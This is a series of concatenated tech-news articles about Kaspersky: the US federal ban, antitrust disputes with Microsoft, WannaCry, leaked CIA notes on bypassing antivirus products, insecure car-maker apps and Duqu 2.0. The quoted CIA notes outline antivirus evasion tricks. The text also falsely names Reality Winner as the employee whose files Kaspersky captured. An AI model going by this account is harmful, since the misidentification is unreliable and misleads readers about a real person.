Kaspersky is now suing the U.S. government to try and repair that damage to its sales as well as its reputation (presuming the U.S. court will find Kaspersky innocent).

President Trump signed into law a bill that bans the Kaspersky Antivirus as well as any other software made by Kaspersky Labs from use in U.S. federal departments, agencies, or organizations. The law applies to any company that is controlled by Kaspersky in any way or in which it has majority ownership.

U.S. Government Bans Kaspersky

Earlier this year, a Wall Street Journal report backed by unnamed U.S. government sources said that hackers working for the Russian government stole documents from an NSA agent. The NSA agent in question took home classified data without permission, and because she was running the Kaspersky antivirus, the report alleged that this is how Kaspersky was able to identify the NSA documents.

Kaspersky has admitted that it identified the NSA files, but as soon as it did, the company deleted the documents its antivirus was able to capture for malware analysis. The antivirus firm also offered to allow independent parties to review its software code.

This response doesn’t seem to have convinced too many in Washington, because after the report, Congress has been scrambling to pass a bill that would ban the antivirus from federal agencies’ networks. The ban of Kaspersky’s software from the federal agencies’ networks was eventually written into the National Defense Authorization Act. The bill will go into effect from the start of 2018.

How It All Started

The whole situation seems to have started when an NSA agent, called Reality Winner, who seems to have been a source for some of The Intercept’s national security stories, took home some classified NSA documents. Kaspersky said that it encountered the documents by mistake, as the files were automatically uploaded to its cloud when the antivirus was scanning Winner’s computer.

This is one issue with cloud-based antivirus software - you have to have a high degree of trust in this type of security software when you’re allowing it to analyze every file you have in your computer and then to upload them to the vendor’s servers. Even Microsoft’s Windows Defender has a cloud component that is enabled by default these days.

The other side of the issue is that if Kaspersky wanted to look clean and not look like it stole the files or that it aided the Russian government to do that, it should have probably alerted the U.S. government about this incident itself.

It’s hard to imagine that wouldn’t have made the U.S. government believe its side of the story more, if the company was the one telling the government about the classified data being leaked by a potential rogue agent. In fact, with Kaspersky protecting multiple U.S. federal networks already, one could argue that was already part of its job.

However, Kaspersky didn’t do that, which makes everyone question the company’s motives and become more inclined to believe the accusations that it was somehow aiding the Russian government in stealing those files.

Dealing With The Aftermath

Regardless of whether or not Kaspersky had any role in Russian hackers obtaining the classified information, it looks like the U.S. government has already made-up its mind about the company, which should impact both Kaspersky’s bottom line as well as its reputation as a trustworthy security solution vendor. The company is now likely going to need to work extra hard to gain its customers' trust again.

In June, Russian antivirus company filed an antitrust lawsuit in the European Union against Microsoft. Kaspersky has been frustrated for some time with what it called "underhanded tactics" from Microsoft that were meant to eliminate third-party antivirus competition on Windows.

At the time, Microsoft claimed that it was only trying to improve Windows security. Now, Microsoft seems to have changed its tune, and the company has made some concessions to help third-party antivirus software better integrate with Windows 10 and be more compatible with the latest updates.

Microsoft’s “Underhanded Tactics”

Kaspersky previously complained that Microsoft was using some questionable tactics to de-emphasize the importance of third-party antivirus programs on Windows, while encouraging users to rely on its own Windows Defender security tool.

The tactics included showing Windows as being secure only when using the Windows Defender tool, while portraying other antivirus software as unsafe.

Another claimed tactic was that Microsoft was previously allowing only one antivirus to run on the system. Therefore, if users had already enabled Windows Defender, it wasn’t possible to run a third-party antivirus, too. However, Microsoft eventually eliminated this requirement in Windows, after complaints from Kaspersky to the Russian Federal Antimonopoly Service (FAS).

Other unsolved issues about which Kaspersky complained included not giving antivirus companies enough time to make their software compatible with the latest Windows updates. Microsoft would then allegedly disable the incompatible antivirus software after a Windows update and obfuscate the third-party antivirus notifications, which ended up reducing these companies’ revenue.

Microsoft Changes Antivirus Policies

In a recent post, Microsoft claimed that it has been working closely with antivirus partners such as Kaspersky, and the recent discussions it has been having with them has led to some changes that will be implemented in the Windows 10 Fall Creators’ Update.

One of the changes includes working more closely with third-party antivirus companies to make their software compatible with the latest Windows update. Microsoft said that Windows customers should expect that the compatibility issues for their preferred third-party antivirus software should be resolved before receiving a new Windows update.

Microsoft will also increase the time its antivirus partners will have to review a new Windows update before it’s rolled out to users.

The company will also allow antivirus vendors to set their own notifications for subscription expiration, which should increase the antivirus vendors’ revenues.

Microsoft said it has also changed how users will be warned when an antivirus program has expired and no longer protects them. Until now, Windows would show a warning only once, which users could easily ignore. Starting with the Windows 10 Fall Creators’ Update, the warning will persist until users decide whether to renew their third-party antivirus subscription or stick to the free Windows Defender.

Microsoft said it appreciated the feedback Kaspersky and other antivirus partners gave it, although one could say these changes may have not happened unless Kaspersky filed not just the first antitrust lawsuit in Russia, but also the second one in the European Union.

What matters in the end is that users are the ones benefiting most from this back and forth between Microsoft and the antivirus companies. If user security suffered because Microsoft kept prioritizing its antivirus tool over the competition, then changes should have indeed been made.

However, if Windows users' security is weakened because of this catering to third-party antivirus vendors, then those changes would not be as welcome. In this case, the changes don’t seem to be affecting users negatively too much, and may in fact end up benefiting them in the long term if a strong competition is maintained between Microsoft’s own security solutions and those of the third-party antivirus providers.

Recently, the Russian antivirus company, Kaspersky, announced that it filed a complaint with the European Commission that Microsoft was abusing its dominance in the PC market to hurt antivirus companies (such as itself). Microsoft indirectly responded in a blog post talking about its partnerships with antivirus companies in general.

Kaspersky’s Complaints

Kaspersky’s main argument against Microsoft is that the company is using Windows to promote its own operating system over other antivirus solutions, often with "underhanded tactics."

Before Windows 8, Microsoft used to develop the Microsoft Security Essentials (MSE) antivirus, which was a third-party program, just like any other antivirus solution. However, starting with Windows 8, Microsoft integrated its own antivirus into the operating system by upgrading its older “Windows Defender” anti-spyware solution with MSE's antivirus capabilities.

As the MSE seemed good enough to stop the majority of viruses, while silently doing its work behind the scenes, many people seemed content with it and stopped using other antivirus software. This scenario was unfavorable to Kaspersky and other antivirus companies. However, third-party antivirus companies could still claim a significantly higher rate of catching viruses in the wild.

According to Kaspersky, the real problems began when Microsoft started using questionable tactics such as:

• Uninstalling existing antivirus programs when there was a new Windows update
• Reducing the time it took to allow the developers to make their antiviruses compatible with the latest update
• Changing notifications in a way that hurt third-party antivirus’ companies subscription numbers
• Not allowing users to permanently deactivate Windows Defender anymore, thus potentially creating conflicts with other antivirus software

In a previous post, Kaspersky also mentioned that Microsoft was using questionable user interface tactics to make it look as if your PC was not secure just because Windows Defender wasn’t enabled, even if some other security solution was. However, Kaspersky said that Microsoft fixed this after it issued a complaint with the Russian Federal Antimonopoly Services.

Microsoft’s Reaction

Microsoft didn’t directly call out Kaspersky in its recent blog post, but the article seems to have been targeting Kaspersky’s complaints. Microsoft started by reminding us about the WannaCry ransomware attack and others like it that put all Windows PCs at risk. As such, the company said that it’s focusing on securing Windows from top-to-bottom on its own, while also allowing third-party security solution providers to further enhance that protection.

Microsoft added that its goal with Windows Defender has been to ensure that all Windows customers have antivirus protection at all times, whether they’ve purchased or downloaded another security solution or not.

In its recent blog post, the company stated the following:

Microsoft supports a rich ecosystem of security partners, each attacking malware and ransomware with diverse perspectives, and continues to work with security partners to support that. As the security landscape, PC industry, and customer needs continue to evolve, Microsoft will continue to work with security partners to ensure that the broad security industry does everything possible to keep customers safe.

Microsoft also said that it’s been working closely with third-party software providers to ensure that their programs are compatible with the latest Windows updates months ahead of time. This statement seems to directly contradict Kaspersky’s claim that sometimes they are given early access to the new updates only two weeks before the Windows update is released.

Perhaps the issue here is that they’re talking about different types of updates. Microsoft may be talking about major upgrades, such as the recent Creator’s Update, whereas Kaspersky may be talking about monthly patch bundles. Security patches can also cause other software, including antivirus programs, to stop working properly due to changes in how certain code behaves.

Microsoft also mentioned that its antivirus security is disabled when a third-party antivirus is running. However, Windows Defender will be re-enabled when the subscription for the third-party solution expires, to continue to protect users.

Avoiding Antitrust Investigations

As long as Microsoft doesn’t use underhanded tactics to eliminate the antivirus competition faster than it would have otherwise by simply continuing to make Windows more secure through various solutions, it should be able to stay clear from new antitrust investigations.

Microsoft got in trouble before for the Internet Explorer integration, and the European Union's solution was to force it to show users other browser options upon Windows installation. If Microsoft doesn’t stray too far away from a similar solution for the antivirus software, then it may not get in trouble again over antitrust issues. However, if some of Kaspersky’s accusations end up being true, then the European Commission could still open a new antitrust investigation against Microsoft.

Kaspersky announced that it has filed an antitrust complaint against Microsoft for disabling its antivirus service with both the European Commission and the German Federal Cartel Office. The company had previously filed an antitrust complaint against Microsoft in its home country, Russia.

Is Microsoft Abusing Its Dominant Position (Again)?

Kaspersky argues that Microsoft has used its dominant position in the desktop operating system market to promote its own “inferior” security software at the expense of users’ previous “self-chosen” security solution. Kaspersky said that such promotion is made using questionable tactics, which it wants to bring to the attention of antitrust authorities.

According to Kaspersky, the earlier complaint in Russia has already led Microsoft to fix some of the issues that Kaspersky raised, despite Microsoft initially denying that it created anti-competitive conditions for third-party security solutions.

One of the questionable tactics Microsoft seems to have used is showing the Windows Defender status page in a way that made it seem like a PC wasn’t as safe as it could be because it was using an antivirus other than Microsoft’s own.

Another issue that Kaspersky raised is that the status page was also showing an orange button on which the words “Turn on” were written. Once again this made users believe that they weren’t secure unless they pressed that button and enabled Microsoft’s antivirus, even though a third-party antivirus was already enabled.

The Russian antivirus company also complained that Microsoft intended to allow only one third-party antivirus to remain active on a system. However, this limitation was ditched. All the other issues mentioned so far were also fixed following Kaspersky’s complaint to the Russian Federal Antimonopoly Service (FAS).

Issues Not Yet Addressed

Kaspersky also complained about the fact that once upon a time Microsoft’s solution used to be a separate program you could install, just like any other third-party Windows application, but now it’s deeply integrated into Windows, to the point where home users can’t completely turn it off or delete it from their OS.

Kaspersky said that Microsoft is also limiting how the license expiration for third-party antivirus solutions is being shown on Windows, which reduced antivirus companies’ subscription revenues. Microsoft only allows the expiration notifications to appear through the new “Action Center,” which doesn’t seem to be that good (possibly on purpose) at drawing users’ attention.

One other issue that Microsoft hasn’t addressed, according to the antivirus company, is that when users are upgrading their older operating systems to Windows 10, the Kaspersky antivirus seems to “disappear,” as Microsoft eliminates some drivers in the process because they aren’t compatible with Windows 10.

Afterwards, Microsoft replaces the Kaspersky antivirus with its own Windows Defender. Microsoft only seems to give users a warning, in passing and in a less readable font, that the Kaspersky antivirus was disabled in the upgrade process.

The main problem Kaspersky has with this is not that Microsoft decided that Kaspersky is incompatible in an arbitrary manner, but that it has reduced the developer testing time for RTM versions from a previous two months to only two weeks. This doesn’t seem to be enough time for Kaspersky, and potentially other antivirus products, to properly ensure their products are compatible with the latest version of Windows.

Perhaps this also wouldn’t be a big issue if Windows didn’t eliminate or disable programs that were somehow not 100% compatible with the latest update. After all, if Microsoft did this to all programs, most games would probably stop working on Windows a couple of years after launch, once their developers stopped releasing patches for them.

It’s also a little ironic that Microsoft seems to give developers only two weeks to test their applications, when it has complained in the past that even three whole months weren’t enough to release a patch for a Google-disclosed security flaw.

Does Kaspersky Have A Strong Case?

We only have Kaspersky’s side of the story so far. The company does seem to raise some interesting issues, but not all of them may be backed by strong arguments. First off, it’s unclear whether Microsoft absolutely has to allow other antivirus products on its platform.

Just because this third-party antivirus market has existed in the past, may not necessarily give these companies a right to exist in the future. Here, we could take a look at how many companies Facebook has killed over the years, as it kept playing with its own platform rules. This issue may ultimately be decided by a court, if the case goes further, because it’s clearly not an easy question to answer.

Another example would be Google banning mobile app ad-blockers from its platform. No antitrust body has started an investigation on Google over this, even though Google is already part of an antitrust investigation in the European Union, albeit for different reasons.

Ideally, Windows wouldn’t need an antivirus solution at all, and with Windows 10’s mandatory updates, there may be less of a need for one in the future. However, the focus may switch to other type of security solutions, such as anti-exploit tools, virtualization sandboxes, and so on.

Kaspersky is probably right that having a single vendor offer security for a platform is not a good idea in the long term. Malware creators would love that to happen because it would be much easier and much more tempting to target a single security solution on which over a billion computers rely.

If Microsoft’s end goal is to ban third-party security solutions from Windows 10, then it may indeed be in the wrong here, even if it’s legally in the right to do so. However, given Microsoft’s dominance in the OS market, it’s possible that antitrust bodies may believe that Microsoft doesn’t have a legal right to unfairly limit or ban third-party security solutions from its platform, either.

The fact that Microsoft has already begun to fix some of the issues that Kaspersky has raised in the past, and that it even has to make use of “underhanded tactics,” as Kaspersky called them, shows that Microsoft may be aware that limiting third-party antivirus choices on its platform in a more direct way isn’t going to be taken lightly either by customers or government bodies.

A vulnerability that Microsoft silently patched in March, after it oddly skipped a whole month's worth of updates, has been used to launch a worldwide ransomware attack against at least 99 countries, including the UK, Spain, Russia, Japan, and the United States.

The vulnerability was being exploited by the NSA for potentially months or years, before the Shadow Brokers group leaked it to the public. Once it was publicly disclosed, anyone could have leveraged it against computers that haven’t been patched since before March.

WannaCry Ransomware

Ransomware is a type of malware that infects your computer, encrypts your files, and then it demands a sum of money before it will decrypt them for you. In other words, it asks you for a “ransom” before it will let you access your files again.

One of the groups that has begun exploiting this Windows vulnerability in unpatched systems made the ransomware "WannaCry." The malware also goes by the names Wcry, Wana Decrypt0r, or WannaCryptor.

Antivirus companies such as Avast and Kaspersky saw many more of their users being attacked by this ransomware today than they usually do. One of the countries that seems to have been attacked most by the ransomware is Russia, but the UK’s National Health Service (NHS), Spain’s Telefonica wireless operator, and even the U.S.'s FedEx service have also been hit, causing significant disruption.

The NHS released a statement saying that it believes the malware is tied to WannaCry and that at this stage, there is no evidence that patient data has been affected. The ransomware showed a message saying that the ransom will double if it’s not paid in three days. (The ransom is currently $300 worth of Bitcoin.) If seven days have passed with no ransom, the group will keep the files encrypted forever.

Ransomware Is Coming Of age

Ransomware has been on a growth path over the past few years for one simple reason: It makes money for its creators. Users who get infected aren’t supposed to pay the ransom, because that would encourage the ransomware makers to keep infecting other PCs. However, not everyone listens to this advice, because some files may be worth much more than the amount of the ransom.

Up until recently, the ransomware threat wasn’t considered that significant. The number of computers that could be affected by a particular type of ransomware was in the hundreds of thousands over a period of many months. That isn’t a lot, compared to the almost billion and a half Windows PCs out there. Eventually, the collective thought process seemed to go, enough systems would get patched, and the ransomware wouldn’t be able to spread anymore.

The previous type of ransomware also spread more randomly, depending on who would click on a malicious email link or who would see a malicious ad. With this latest attack, though, ransomware seems to have arrived a point where it doesn’t just randomly infect users through malicious ads and links anymore; it can now spread quickly to and throughout large organizations and disrupt their functioning for days at a time, if not longer.

The new version of Wana Decrypt0r has reportedly infected tens of thousands of computers within hours. The number soon could grow much higher, because the types of medical devices that use unpatched versions of Windows will likely remain vulnerable to this attack much longer.

One reason the malware was able to spread so fast is because it was designed to spread like a worm inside a network, self-replicating on all vulnerable systems. If this is the type of attacks we can expect from ransomware from now on, then everyone will have to take this type of malware much more seriously. (People also need to update their systems in a timely manner.)

How To Prevent WannaCry And Other Ransomware

if you haven’t installed the March patch bundle on your computer yet, it’s time to do so. Keeping your system up to date is one of the best ways to keep it secure. It won’t save you from malware that uses zero-day vulnerabilities, but it should keep your system safe from the vast majority of exploits that rely on publicly disclosed vulnerabilities--such as the one used by the WannaCry malware.

If for some reason you can’t patch your system, having an antivirus or similar security solution that has confirmed it can block the latest version of WannaCry and other ransomware would be a good way to stop it, too.

According to Cisco’s Talos threat intelligence team, the ransomware looks for open 139 and 445 internet ports. If your organization uses these ports, it may be time to disable them, at least until your systems are patched.

WikiLeaks recently published thousands of documents that the organization said belongs to the CIA. Among them, there was a document that showed a list of antivirus and other security products that have been exploited and bypassed by the CIA.

The list included the following software products:

• Comodo
• Avast
• F-Secure
• Zemana Antilogger
• Zone Alarm
• Trend Micro
• Symantec
• Rising
• Panda Security
• Norton
• Malwarebytes Anti-Malware
• EMET (Enhanced Mitigation Experience Toolkit)
• Microsoft Security Essentials
• McAfee
• Kaspersky
• GDATA
• ESET
• ClamAV
• Bitdefender
• Avira
• AVG

You probably recognize most, if not all, of the products on that list. The list includes Microsoft’s “Security Essentials” antivirus program, which was later converted into the built-in “Windows Defender” program in Windows 8 and later, as well as EMET, Microsoft’s anti-exploit security tool (mainly for enterprise users).

EMET was recently deprecated by Microsoft, because the company said that many of EMET’s anti-exploit features such as DEP, ASLR, Control Flow Guard (CFG), as well as other mitigations to bypass the User Account Control (UAC), were already built into Windows 10.

Microsoft said that because the security features are built-in, they should offer better security than the ad-hoc security that EMET tried to provide. The CIA documents released by WikiLeaks date from 2014, before Windows 10 came out. Therefore, we don't know what new capabilities the CIA may have obtained since then, and whether or not the new Windows 10 security features were also bypassed.

Bypassing Antivirus Programs

The leaked documents pertaining to the list of antivirus programs that have been exploited by the CIA seem to have been redacted, likely by WikiLeaks. The organization said that it made over 70,000 redactions in total, mainly to remove harmful code (WikiLeaks has been accused in the past of “hosting malware” because the emails it released contained malware targeted at the recipients of the leaked emails), as well as personal details and IP addresses. However, it’s not clear why the organization removed the technical information about how most of the antivirus programs in the list were exploited.

Only partial information was left about CIA’s exploit capabilities against three antivirus programs: F-Secure, Avira, and AVG.

On F-Secure

In OSB's experience, F-Secure has generally been a lower tier product that causes us minimal difficulty. The only annoyance we have observed is that F-Secure has an apparent entropy-based heuristic that flags Trojaned applications or other binaries containing encrypted/compressed payloads. Two defeats are known to exist: On involves using RAR file string tables in the resource section, the other involves cloning a RAR file manifest file – the manifest technique also works against Avira's entropy-based heuristics.

On Avira

Avira has historically been a popular product among CT targets, but is typically easy to evade. Similar to F-Secure, Avira has an apparent entropy-based heuristic that flags binaries containing encrypted/compressed payloads, but there are two known defeats.

On AVG

AVG Catches a Payload Dropped to Disk and Launched via Link File Well After Execution (Process Hollowing)

Perhaps the fact that the CIA can bypass most antivirus products should not be that surprising. After all, any sophisticated attacker who wants to develop new malware would also try to find ways to bypass the popular antivirus products. Otherwise, the malware wouldn’t be very effective, and it would be caught too early.

Google’s Project Zero security research team has also shown that antivirus programs can sometimes be some of the most vulnerable programs you may be running on your system. That’s not just because some of the antivirus companies are careless with the code they write, but mainly because the same techniques they use to “make users safer” are what create the vulnerabilities in users’ systems in the first place.

For instance, some of them do man-in-the-middle attacks against users’ browsers in order to analyze the encrypted pages that the users are visiting. However, an attacker could exploit this by taking over the capability and then using it against the users. Therefore, in this case, the antivirus created a vulnerability that perhaps wouldn’t have existed otherwise.

Staying Safe Online

The most common sense ways to stay safe are still to be careful about what you install on your system, use accounts with limited rights by default, and update your operating system and applications on time. This should save you from the vast majority of attacks and malware.

If you want to go the extra mile, you could also browse the web in a Linux virtual machine, or even use a more compartmentalized operating system such as Qubes OS, but these tools may not be for everyone.

Even as most car manufacturers want to deliver autonomous cars in the next few years, they still seem to be far behind in adopting security best practices to keep cars and drivers safe. According to Kaspersky, the Android apps of well-known car makers could now expose millions of cars to theft or other risks. The manufacturers still don't seem to be treating security as the life-and-death issue that it is when it comes to smart cars and autonomous vehicles.

Connected Cars

The idea of a “connected car” started becoming popular a few years ago, as manufacturers wanted to give users more “smart features” that would set their cars apart from those of the competitors.

The smart features, which you can enable through smartphone applications, include finding out the GPS coordinates of a car, tracing its route, opening its doors, starting its engine, and turning on its auxiliary devices. The issue with these features is that if you give smartphone applications the ability to control a car’s engine over the internet, that means it would be roughly as easy for an attacker to take control over that car’s engine over the internet as well.

One of the most important security principles is reducing the attack surface. Car makers seem to be doing the exact opposite right now, by implementing over-the-internet remote control for cars’ most critical systems. Components, such as the engine, brakes, wheels, or anything that if taken by bad actors over would jeopardize the driver’s life, should never be controlled directly over the internet.

This is really the same principle that IoT makers should abide by as well, except in this case it’s not just your privacy that’s at stake, but your actual car (if it’s stolen), or even your life.

Kaspersky’s App Report

Kaspersky reviewed seven of the most popular applications from well-known car manufacturers to see if they can be used to gain access to the car’s infrastructure. Kaspersky has decided to keep the names of the manufacturers hidden for now, although it would’ve probably served the public’s interest much more if it had made them all public, at least after they all announce that they’ve fixed their apps.

Car makers haven’t shown a willingness to significantly improve their systems’ security so far. It’s likely that this isn’t going to change much if such reports hide their names so the car manufacturers don’t have to suffer any of the consequences for it.

The security company reviewed the following aspects in the apps:

Availability of potentially dangerous features that would make it possible for someone to steal the carWhether the app employs obfuscation techniques to make it hard to reverse engineer itWhether the app checks for root permissions on the car owner’s Android device. Rooted devices allow malware to infect other apps much more easilyAvailability of GUI overlay protection to stop bad actors from stealing credentialsAvailability of an integrity check that verifies whether the app’s code has been changed

As we can see from Kaspersky’s table below, all of the apps failed all of Kaspersky’s test. Perhaps the most incredible one is that none of these well-known car makers seem to encrypting users’ credentials. These are the same car makers that we’ll have to trust in a few years with their autonomous cars to safely drive us around, yet they can’t even implement 1990s-era internet security guidelines for their cars and related systems.

Car Theft And More

According to Kaspersky, the primary risk for these vulnerabilities is that car thieves could unlock the doors more easily, and then use programming units to “write a new key into the car’s on-board system”--another consequence, if you will, of making cars "smarter." The thieves can steal the cars without ever having to break any physical part. However, according to Kaspersky, car stealing is not the only thing that should scare you, if you’re an owner of one of these cars:

“Also, the risks should not be limited to mere car theft. Accessing the car and deliberate tampering with its elements may lead to road accidents, injuries, or death,” said Kaspersky in its report.

Autonomous Cars

Car makers don’t seem to have figured out a solid plan for protecting their connected cars against hackers yet, or even design their smart features in a secure way. However, they’re already moving full steam ahead to ship autonomous vehicles over which a driver (or rather a passenger) has no control.

Autonomous vehicles, or vehicles with autonomous driving systems that still allow the driver to take control when needed, will likely end up saving millions of lives because of their increased safety on the road. However, they could also expose their owners to other types of dangers, from hacking while on the road to ransomware that locks the car until the owner pays a significant sum of money.

All of this could be mostly avoided if car makers start treating security as seriously as they do developing self-driving systems and electric vehicle platforms. The digital security of these future cars will be just as important for their businesses, especially if makers of autonomous vehicles end up liable for accidents (as it would be their systems controlling the cars at all times, rather than the drivers).

Time For Car Makers To Be Responsible

The real crux of the problem here is that car makers should already know that Android devices, or even iPhones, can be vulnerable to all sorts of security vulnerabilities. That’s why they shouldn’t be trusting them with control over the cars’ door locks, let alone giving them remote control over the cars’ engines.

This is less of a technological issue, such as whether the car makers enabled integrity and root checks for their apps, and more of a responsibility issue. Allowing remote access through apps to car doors and the car engines just to slightly one-up the competition doesn’t seem like a responsible thing to do from these well-known car brands, and that needs to change.

In a recent interview on NBC News, the founder of the Kaspersky anti-virus company, Eugene Kaspersky, said that in the future there won't be just PCs or smartphones getting hacked, but everything that's called "smart."

That includes smart fridges, smart coffee machines, smart cars, smart TVs, smart homes, and so on. "You are watching the TV, the TV is watching you," he added. It wasn't too long ago that we discovered LG and Samsung smart TVs could either listen to your conversations or track you in other ways.

Eugene Kaspersky even went on to say that "IoT," which normally stands for the "Internet of Things," should really be called the "Internet of Threats," because IoT devices are going to vastly expand the ways in which hackers can get to you and your information.

We've seen chip companies such as ARM, Imagination and Freescale try to tackle IoT security by securely isolating critical data at the hardware level, where most attacks could be stopped dead in their tracks.

Google and ARM have also been working on their own simpler and more secure operating systems for IoT devices. The two companies have been working on Thread as well, which is a mesh networking protocol that's supposed to keep most IoT devices off the Internet so they can't be exposed directly to hackers.

Even all of the above will likely not be enough to keep IoT devices very secure. It will ultimately be up to the OEMs making those $50 smart coffee machines to update them on time, whenever a new vulnerability is found for their devices, and to do it for as long as their customers keep using them (which could be 10 years or more, especially in the case of smart TVs or cars).

Having certain types of electronics become smarter does have its own value and advantages, which is why the Internet of Things (or Threats, as it were) seems unavoidable. If the security of these devices becomes a top priority for customers, then those companies selling IoT devices with weak security might eventually be pushed out of the market. This could be harder to achieve in certain markets (such as with coffee machines), while it could be much easier to achieve in markets where "smart things" can kill you if you get hacked (such as the smart car market).

Follow Tom's Hardware on Twitter, Facebook, and Google+.

Kaspersky, a leading anti-virus company from Russia, announced that it uncovered a piece of malware on its networks that tried to steal information about its products and clients.

The company called the malware "Duqu 2.0" due to its similarity to the "Duqu" malware found in 2011 and used in attacks against Iran, India, France and Ukraine. Duqu was also seen at the time as being linked to the Stuxnet malware, which is believed to be created by the U.S.'s and Israel's spy agencies.

The attack was found early this year when Kaspersky was conducting a test for an "anti-APT" (Advanced Persistent Threat) solution the company was developing. The malware was otherwise almost impossible to detect due to its ability to reside only in kernel memory and delete all of its traces on the disk.

It also didn't connect directly to a command-and-control server to receive instructions. Instead, the attackers infected the network gateways in order to proxy the company's traffic through their own command-and-control servers.

The attack also used three zero-day vulnerabilities for Microsoft's software installers, which are used by many enterprise customers. Normally such zero-day vulnerabilities cost hundreds of thousands of dollars each on the black market. However, if the attacker was indeed the NSA, then it could've also gotten it for free from "cyber threat sharing" programs, where companies give the NSA access to their vulnerabilities months before patches are ready or before anyone else knows the bugs even exist. Such programs are supposed to give the NSA advance notice to secure its networks, but they can also be used for offensive purposes before the vulnerabilities are patched by the companies.

Whoever the attackers were, they must have thought they could never be detected, or they thought an eventual detection is worth the price if they could steal useful data. Kaspersky said that because it detected the attack early, only some intellectual property was stolen, but its customers' data is safe.

However, it warned that the attack may already be used against other high-value targets around the world. Others may not have Kaspersky's expertise to protect themselves against this complex and undetectable malware, so the company will offer assistance to those interested in detecting Duqu 2.0.

Kaspersky has already contacted the police in different countries to investigate this attack and called for law enforcement to openly prosecute such attacks, which can ultimately leave ordinary citizens exposed to even more malicious attackers.

“Spying on cybersecurity companies is a very dangerous tendency. Security software is the last frontier of protection for businesses and customers in the modern world, where hardware and network equipment can be compromised. Moreover, sooner or later technologies implemented in similar targeted attacks will be examined and utilized by terrorists and professional cybercriminals. And that is an extremely serious and possible scenario," commented Eugene Kaspersky, CEO of Kaspersky Lab.“Reporting such incidents is the only way to make the world more secure. This helps to improve the security design of enterprise infrastructure and sends a straightforward signal to developers of this malware: all illegal operations will be stopped and prosecuted. The only way to protect the world is to have law enforcement agencies and security companies fighting such attacks openly. We will always report attacks regardless of their origin," he added.

Follow us @tomshardware, on Facebook and on Google+.